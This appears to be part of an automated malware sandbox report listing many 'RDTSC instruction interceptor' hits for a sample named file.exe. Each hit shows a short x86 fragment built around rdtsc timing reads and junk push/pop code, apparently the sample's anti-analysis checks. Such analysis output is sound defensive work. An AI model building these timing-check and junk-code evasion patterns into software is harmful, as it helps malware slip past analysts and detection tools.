              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEEB3 second address: 3EEEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F3B60BFE516h 0x0000000d jc 00007F3B60BFE516h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EEEC6 second address: 3EEEDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE272 second address: 3EE277 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE277 second address: 3EE283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F3B605222C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE283 second address: 3EE28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE534 second address: 3EE547 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE7E8 second address: 3EE813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007F3B60BFE521h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B60BFE521h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE932 second address: 3EE938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE938 second address: 3EE942 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3B60BFE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE942 second address: 3EE948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F13F3 second address: 3F1402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 ja 00007F3B60BFE516h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F1572 second address: 3F158B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jc 00007F3B605222C6h 0x0000000e popad 0x0000000f pop edi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F3B605222C6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F158B second address: 3F158F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F1705 second address: 3F1719 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B605222C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jg 00007F3B605222C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F1719 second address: 3F1745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007F3B60BFE516h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F3B60BFE523h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F3B60BFE516h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F1A17 second address: 3F1A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F1A1B second address: 3F1A31 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3B60BFE520h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8159 second address: 3F8178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F3B605222D1h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F8178 second address: 3F8182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3B60BFE516h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6C91 second address: 3F6C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6C97 second address: 3F6CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE51Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6CA8 second address: 3F6CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F7E2D second address: 3F7E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3B60BFE51Fh 0x0000000a popad 0x0000000b pushad 0x0000000c jno 00007F3B60BFE51Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3B60BFE523h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FEA09 second address: 3FEA13 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FEA13 second address: 3FEA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FEA19 second address: 3FEA1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FEA1D second address: 3FEA29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F3B60BFE516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FEFA3 second address: 3FEFAF instructions: 0x00000000 rdtsc 0x00000002 je 00007F3B605222CEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FF267 second address: 3FF26D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FF539 second address: 3FF551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FF551 second address: 3FF56D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jbe 00007F3B60BFE516h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F3B60BFE51Ch 0x00000016 jp 00007F3B60BFE516h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FF56D second address: 3FF577 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B605222D9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FFA8C second address: 3FFABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3B60BFE527h 0x0000000a pushad 0x0000000b jp 00007F3B60BFE51Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F3B60BFE516h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FFABF second address: 3FFAC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FFAC3 second address: 3FFAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402963 second address: 402969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402AC1 second address: 402AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402AC5 second address: 402ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402ACD second address: 402AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B60BFE51Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 402F7E second address: 402F88 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3B605222C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 403219 second address: 40321D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40321D second address: 40322B instructions: 0x00000000 rdtsc 0x00000002 je 00007F3B605222C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40337E second address: 403384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 403384 second address: 403388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 403388 second address: 4033AA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3B60BFE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B60BFE51Ch 0x00000013 jc 00007F3B60BFE535h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4033AA second address: 4033C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222D9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4033C7 second address: 4033D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B60BFE51Ah 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 403515 second address: 40351B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40351B second address: 403535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3B60BFE51Bh 0x0000000e jp 00007F3B60BFE516h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 403535 second address: 403567 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3B605222C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3B605222D4h 0x00000013 jmp 00007F3B605222D0h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EE6F second address: 35EE73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EE73 second address: 35EE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35EE79 second address: 35EE8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE51Ch 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40F72A second address: 40F732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40F732 second address: 40F73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40F73B second address: 40F73F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40F73F second address: 40F749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40F749 second address: 40F757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40FBF5 second address: 40FC05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jng 00007F3B60BFE516h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40FC05 second address: 40FC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40FEFF second address: 40FF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40FF03 second address: 40FF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222CBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410203 second address: 410218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F3B60BFE51Ch 0x0000000f jne 00007F3B60BFE516h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410218 second address: 41021E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41021E second address: 410224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410D02 second address: 410D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F3B605222D5h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4191D1 second address: 4191D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3517BB second address: 3517FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F3B605222CCh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B605222CBh 0x00000012 pushad 0x00000013 jmp 00007F3B605222D9h 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42517B second address: 42519A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42519A second address: 4251AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B605222CFh 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 428139 second address: 42815E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3B60BFE525h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jg 00007F3B60BFE516h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42815E second address: 428162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 428162 second address: 428173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE51Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 428173 second address: 42817B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42817B second address: 4281A1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3B60BFE516h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 jnc 00007F3B60BFE516h 0x0000001c ja 00007F3B60BFE516h 0x00000022 pop eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4281A1 second address: 4281A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364020 second address: 364027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364027 second address: 36402C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36402C second address: 364032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 364032 second address: 364038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 427E10 second address: 427E16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 427E16 second address: 427E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 427E20 second address: 427E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 427E24 second address: 427E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 427E28 second address: 427E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 427E33 second address: 427E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnp 00007F3B605222CEh 0x0000000b jns 00007F3B605222C6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jno 00007F3B605222C6h 0x0000001f jmp 00007F3B605222D1h 0x00000024 popad 0x00000025 js 00007F3B605222CCh 0x0000002b jnl 00007F3B605222C6h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42BBD1 second address: 42BBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43360F second address: 433617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43DF12 second address: 43DF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE51Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43DF20 second address: 43DF24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43DF24 second address: 43DF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43DF30 second address: 43DF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43DF34 second address: 43DF53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE523h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442568 second address: 44256C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442819 second address: 442832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE525h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442832 second address: 442836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442836 second address: 442862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3B60BFE528h 0x0000000c js 00007F3B60BFE516h 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442862 second address: 442884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B605222D3h 0x00000007 jp 00007F3B605222C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 442884 second address: 44289E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B60BFE522h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
